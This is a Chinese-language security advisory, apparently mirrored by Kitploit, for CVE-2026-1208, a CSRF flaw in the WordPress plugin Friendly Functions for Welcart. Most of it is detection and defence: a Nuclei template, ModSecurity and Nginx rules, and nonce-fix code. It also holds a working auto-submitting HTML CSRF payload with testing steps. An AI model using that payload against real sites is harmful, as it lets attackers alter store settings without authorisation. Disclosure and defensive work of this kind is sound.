Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1208 — 针对Welcart的友好功能 <= 1.2.5 - 跨站请求伪造导致设置更新 | Kitploit
工具/GitHubGitHub/snailsploit/cve-2026-1208
漏洞分析漏洞利用Web安全渗透测试论文与研究学习与教育
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

针对Welcart的友好功能 <= 1.2.5 - 跨站请求伪造导致设置更新

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1208:Friendly Functions for Welcart 中的跨站请求伪造

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

关键词: CVE-2026-1208, Friendly Functions for Welcart 漏洞, CSRF, 跨站请求伪造, WordPress 安全, WordPress 插件漏洞, CWE-352, Welcart 安全, 设置篡改, WordPress CVE 2026

目录

  • 概述
  • 漏洞详情
  • 技术分析
  • 攻击向量
  • 概念验证
  • 修复指南
  • CVSS 指标
  • 参考资料
  • 安全联系

概述

Friendly Functions for Welcart WordPress 插件 CSRF 漏洞(CVE-2026-1208) - 一种安全缺陷,允许未经身份验证的攻击者通过伪造请求修改插件设置。

在 Friendly Functions for Welcart 插件中发现了一个跨站请求伪造(CSRF)漏洞,该漏洞允许未经身份验证的攻击者通过诱使管理员点击恶意链接来更新插件设置。

发现者: Kai Aizen (SnailSploit)
公开日期: 2026 年 1 月 23 日
CVSS 分数: 4.3(中危)
CWE: CWE-352 - 跨站请求伪造(CSRF)
插件: Friendly Functions for Welcart
攻击类型: 跨站请求伪造导致设置更新
所需权限: 无(未经身份验证的攻击 + 社会工程学)

漏洞详情

描述

WordPress 的 Friendly Functions for Welcart 插件在所有版本(包括 1.2.5 版本)中容易受到跨站请求伪造的攻击。这是因为设置页面缺少或错误的 nonce 验证。这使得未经身份验证的攻击者能够通过伪造请求更新插件设置,前提是他们可以诱使站点管理员执行诸如点击链接之类的操作。

影响

此漏洞允许未经身份验证的攻击者:

  • 在未授权的情况下修改插件设置
  • 操纵 Welcart 电子商务功能
  • 潜在地破坏商店运营
  • 与其他漏洞链式利用以进行升级攻击

受影响版本

  • 受影响: 所有版本 ≤ 1.2.5
  • 已修复: 版本 1.2.6 及以上

CVSS v3.1 指标

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

技术细节

该漏洞存在于设置页面的实现中,具体表现为:

  1. 插件设置表单缺少正确的 nonce 验证
  2. 处理设置更新请求时未验证请求来源
  3. 没有生成或验证 CSRF 令牌
  4. 可以通过跨域请求执行管理操作

受影响代码位置

该漏洞在以下位置被发现:

  • ffw_function_settings.php - 第 53 行
  • ffw_function_settings.php - 第 58 行

攻击向量

攻击需要社会工程学手段,诱使已通过身份验证的管理员在登录 WordPress 网站的同时访问恶意页面或点击精心构造的链接。

root@kitploit:~
目标:已安装 Friendly Functions for Welcart 的 WordPress 管理员
方法:带有自动提交表单的恶意 HTML 页面
触发条件:管理员点击链接或访问攻击者控制的页面

概念验证

CSRF HTML 载荷

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- 根据需要添加其他设置字段 -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ 警告: 此 PoC 仅用于教育和授权测试目的。

测试步骤

  1. 搭建一个已安装 Friendly Functions for Welcart <= 1.2.5 的 WordPress 实例
  2. 将 CSRF 载荷托管在攻击者控制的服务器上
  3. 以管理员身份登录目标 WordPress 网站
  4. 访问攻击者控制的页面(模拟点击恶意链接)
  5. 观察插件设置在未经明确同意的情况下被修改

检测

WordPress 插件检查

root@kitploit:~
# 检查是否安装了受影响版本
wp plugin list | grep -i "friendly-functions-for-welcart"

# 获取具体版本
wp plugin get friendly-functions-for-welcart --field=version

安全扫描规则

Nuclei 模板:

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF 导致设置更新
  author: SnailSploit
  severity: medium
  description: |
    WordPres 的 Friendly Functions for Welcart 插件在版本 <= 1.2.5 中
    由于缺少 nonce 验证,容易受到 CSRF 攻击。
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

Web 应用防火墙规则

ModSecurity 规则:

root@kitploit:~
# CVE-2026-1208 - 阻止针对 FFW 设置的 CSRF 尝试
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# 替代方案:如果 Referer 不匹配站点域名则阻止
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

Nginx 规则:

root@kitploit:~
# CVE-2026-1208 - FFW 设置的 CSRF 保护
location /wp-admin/admin.php {
    # 检查 ffw-settings 页面是否缺少正确 Referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # 传递给 PHP 处理器
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

修复

针对站点管理员

立即操作:

  1. 立即将 Friendly Functions for Welcart 更新到 1.2.6 或更高版本
  2. 检查站点插件设置是否存在未授权修改
  3. 如果无法立即更新,可考虑暂时禁用该插件

更新说明

  1. 在 WordPress 管理后台导航到 插件 > 已安装插件
  2. 找到 "Friendly Functions for Welcart"
  3. 点击 立即更新 升级到 1.2.6 或更高版本
  4. 确认更新成功
  5. 检查并确认插件设置正确

针对开发人员

确保所有设置表单都实施了正确的 CSRF 保护:

root@kitploit:~
// WordPress 中正确 CSRF 保护的示例
// 在表单中:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// 在表单处理函数中:
function process_settings_update() {
    // 验证 nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // 检查权限
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // 处理设置更新
    // ...
}

时间线

  • 2026 年 1 月 23 日 - 漏洞公开披露
  • 2026 年 1 月 23 日 - CVE-2026-1208 分配
  • 版本 1.2.6 - 插件供应商发布补丁

参考资料

  • Wordfence 情报数据库条目
  • WordPress 插件 Trac - 第 53 行
  • WordPress 插件 Trac - 第 58 行
  • 插件变更集(补丁)
  • MITRE CVE 条目

致谢

研究人员:

  • Kai Aizen - SnailSploit

披露流程: 通过 Wordfence 漏洞悬赏计划协调

免责声明

此信息仅用于安全研究和防御目的。任何出于恶意目的利用此漏洞的行为均属非法且不道德。在测试不属于您自己的系统之前,请务必获得适当的授权。

联系

有关此漏洞的问题或更多信息:

  • 邮箱: [email protected]
  • 网站: snailsploit.com
  • 组织: SnailSploit Security Research

最后更新:2026 年 1 月 23 日


📚 文档与作者

本项目的完整文章、方法论及相关研究位于:

https://snailsploit.com/security-research/cves/cve-2026-1208/

由 Kai Aizen 创建——独立进攻性安全研究人员。

snailsploit.com · 研究 · 框架 · GitHub · LinkedIn · ResearchGate · X/Twitter

相同的攻击。不同的基底。

下载工具
指标值
攻击向量网络(AV:N)
攻击复杂度低(AC:L)
所需权限无(PR:N)
用户交互需要(UI:R)
范围未改变(S:U)
机密性无(C:N)
完整性低(I:L)
可用性无(A:N)